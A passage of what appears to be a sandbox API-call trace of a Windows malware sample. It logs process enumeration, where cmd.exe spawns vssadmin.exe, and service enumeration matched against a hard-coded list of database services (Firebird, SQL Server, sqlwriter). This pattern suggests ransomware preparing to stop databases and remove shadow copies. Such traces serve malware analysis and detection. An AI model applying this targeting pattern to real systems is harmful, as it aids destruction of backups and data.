szExeFile="travel-fits-insights.exe")) returned 1 [0033.163] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0033.163] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0033.164] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0033.164] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0033.219] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0033.219] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0033.220] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0033.220] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0033.220] lstrlenW (lpString="delight.exe") returned 11 [0033.220] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0033.221] lstrlenW (lpString="within enquiry.exe") returned 18 [0033.221] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0033.222] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0033.222] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0033.222] lstrlenW (lpString="dllhost.exe") returned 11 [0033.222] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0033.223] lstrlenW (lpString="dllhost.exe") returned 11 [0033.223] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0033.224] lstrlenW (lpString="agent1c.exe") returned 11 [0033.224] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0033.224] lstrlenW (lpString="cmd.exe") returned 7 [0033.224] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0033.225] lstrlenW (lpString="conhost.exe") returned 11 [0033.225] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0033.226] lstrlenW (lpString="vssadmin.exe") returned 12 [0033.226] Process32NextW (in: hSnapshot=0x160, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0033.227] CloseHandle (hObject=0x160) returned 1 [0033.227] Sleep (dwMilliseconds=0x1f4) [0034.455] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x37204e8 [0034.455] EnumServicesStatusExW (in: hSCManager=0x37204e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0034.456] GetLastError () returned 0xea [0034.456] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11e4) returned 0x380afc8 [0034.456] EnumServicesStatusExW (in: hSCManager=0x37204e8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x380afc8, cbBufSize=0x11e4, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x380afc8, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0034.456] CloseServiceHandle (hSCObject=0x37204e8) returned 1 [0034.457] lstrlenW (lpString="Appinfo") returned 7 [0034.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0034.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0034.457] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0034.457] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0034.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0034.457] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0034.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0034.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0034.457] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0034.457] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0034.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0034.457] lstrlenW (lpString="AudioSrv") returned 8 [0034.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0034.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0034.457] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0034.457] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0034.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0034.457] lstrlenW (lpString="BFE") returned 3 [0034.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0034.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0034.457] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0034.457] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0034.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0034.457] lstrlenW (lpString="CryptSvc") returned 8 [0034.457] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0034.457] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0034.457] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0034.457] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0034.457] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0034.458] lstrlenW (lpString="CscService") returned 10 [0034.458] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0034.458] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0034.458] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0034.458] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0034.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0034.458] lstrlenW (lpString="DcomLaunch") returned 10 [0034.458] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0034.458] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0034.458] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0034.458] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0034.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0034.458] lstrlenW (lpString="Dhcp") returned 4 [0034.458] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0034.458] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0034.458] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0034.458] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0034.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0034.458] lstrlenW (lpString="Dnscache") returned 8 [0034.458] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0034.458] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0034.458] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0034.458] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0034.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0034.458] lstrlenW (lpString="DPS") returned 3 [0034.458] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0034.458] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0034.458] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0034.458] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0034.458] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0034.458] lstrlenW (lpString="eventlog") returned 8 [0034.458] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0034.458] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0034.458] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0034.458] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0034.459] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0034.459] lstrlenW (lpString="EventSystem") returned 11 [0034.459] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0034.459] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0034.459] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0034.459] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0034.459] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0034.459] lstrlenW (lpString="gpsvc") returned 5 [0034.459] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0034.459] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0034.459] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0034.459] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0034.459] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0034.459] lstrlenW (lpString="iphlpsvc") returned 8 [0034.459] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0034.459] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0034.459] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0034.459] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0034.459] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0034.459] lstrlenW (lpString="LanmanServer") returned 12 [0034.459] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0034.459] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0034.459] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0034.459] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0034.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0034.460] lstrlenW (lpString="LanmanWorkstation") returned 17 [0034.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0034.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0034.460] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0034.460] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0034.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0034.460] lstrlenW (lpString="lmhosts") returned 7 [0034.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0034.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0034.460] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0034.460] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0034.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0034.460] lstrlenW (lpString="MMCSS") returned 5 [0034.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0034.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0034.460] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0034.460] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0034.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0034.460] lstrlenW (lpString="MpsSvc") returned 6 [0034.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0034.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0034.460] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0034.460] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0034.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0034.460] lstrlenW (lpString="Netman") returned 6 [0034.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0034.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0034.460] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0034.460] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0034.460] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0034.460] lstrlenW (lpString="netprofm") returned 8 [0034.460] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0034.460] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0034.460] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0034.461] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0034.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0034.461] lstrlenW (lpString="NlaSvc") returned 6 [0034.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0034.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0034.461] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0034.461] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0034.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0034.461] lstrlenW (lpString="nsi") returned 3 [0034.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0034.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0034.461] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0034.461] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0034.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0034.461] lstrlenW (lpString="PcaSvc") returned 6 [0034.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0034.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0034.461] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0034.461] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0034.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0034.461] lstrlenW (lpString="PlugPlay") returned 8 [0034.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0034.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0034.461] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0034.461] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0034.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0034.461] lstrlenW (lpString="Power") returned 5 [0034.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0034.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0034.461] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0034.461] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0034.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0034.461] lstrlenW (lpString="ProfSvc") returned 7 [0034.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0034.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0034.461] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0034.462] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0034.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0034.462] lstrlenW (lpString="RpcEptMapper") returned 12 [0034.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0034.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0034.462] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0034.462] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0034.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0034.462] lstrlenW (lpString="RpcSs") returned 5 [0034.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0034.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0034.462] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0034.462] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0034.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0034.462] lstrlenW (lpString="SamSs") returned 5 [0034.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0034.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0034.462] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0034.462] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0034.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0034.462] lstrlenW (lpString="Schedule") returned 8 [0034.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0034.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0034.462] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0034.462] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0034.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0034.462] lstrlenW (lpString="SENS") returned 4 [0034.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0034.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0034.462] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0034.462] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0034.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0034.462] lstrlenW (lpString="ShellHWDetection") returned 16 [0034.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0034.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0034.463] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0034.463] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0034.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0034.463] lstrlenW (lpString="Spooler") returned 7 [0034.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0034.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0034.463] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0034.463] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0034.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0034.463] lstrlenW (lpString="SysMain") returned 7 [0034.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0034.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0034.463] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0034.463] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0034.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0034.463] lstrlenW (lpString="Themes") returned 6 [0034.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0034.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0034.463] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0034.463] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0034.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0034.463] lstrlenW (lpString="TrkWks") returned 6 [0034.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0034.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0034.463] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0034.463] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0034.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0034.463] lstrlenW (lpString="UxSms") returned 5 [0034.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0034.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0034.463] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0034.463] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0034.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0034.463] lstrlenW (lpString="WdiServiceHost") returned 14 [0034.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0034.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0034.464] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0034.464] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0034.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0034.464] lstrlenW (lpString="WdiSystemHost") returned 13 [0034.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0034.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0034.464] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0034.464] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0034.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0034.464] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0034.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0034.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0034.464] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0034.464] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0034.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0034.464] lstrlenW (lpString="Winmgmt") returned 7 [0034.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0034.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0034.464] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0034.464] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0034.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0034.464] lstrlenW (lpString="WPDBusEnum") returned 10 [0034.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0034.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0034.464] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0034.464] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0034.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0034.464] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x380afc8 | out: hHeap=0x5f0000) returned 1 